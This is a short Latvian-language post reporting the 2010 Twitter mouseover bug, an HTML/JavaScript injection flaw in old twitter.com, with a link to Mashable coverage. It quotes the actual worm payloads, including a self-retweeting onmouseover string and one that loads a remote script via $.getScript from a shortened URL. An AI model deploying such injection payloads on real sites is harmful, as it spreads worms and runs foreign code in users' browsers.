Izskatās, ka kāds veiksmīgi atradis HTML injection caurumu vecajā www.twitter.com versijā, kas nepareizi apstrādā HTML + Javascript tvītus un diezgan viegli, piemēram, ļauj izveodot mouseover retvītu.
Kods1, kas tiek retvītots:
http://a.no/@”onmouseover=”;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit()” style=”color:#000;background:#000;/
Kods2 jau no HTML
http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7’)”/
un attiecīgais HTML:
<a target=”_blank” rel=”nofollow” onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7’)” style=”font-size: 1e+12px;” href=”http://t.co/@”>http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7’)”/</a>
Un rezultāts izskatās kaut kā šādi:
un šādi (īstais burtu izmērs uzstādīts kā 1e+12px, šeit attēloti 90px izmērā:
Reku arī International: http://mashable.com/2010/09/21/twitter-mouseover-bug/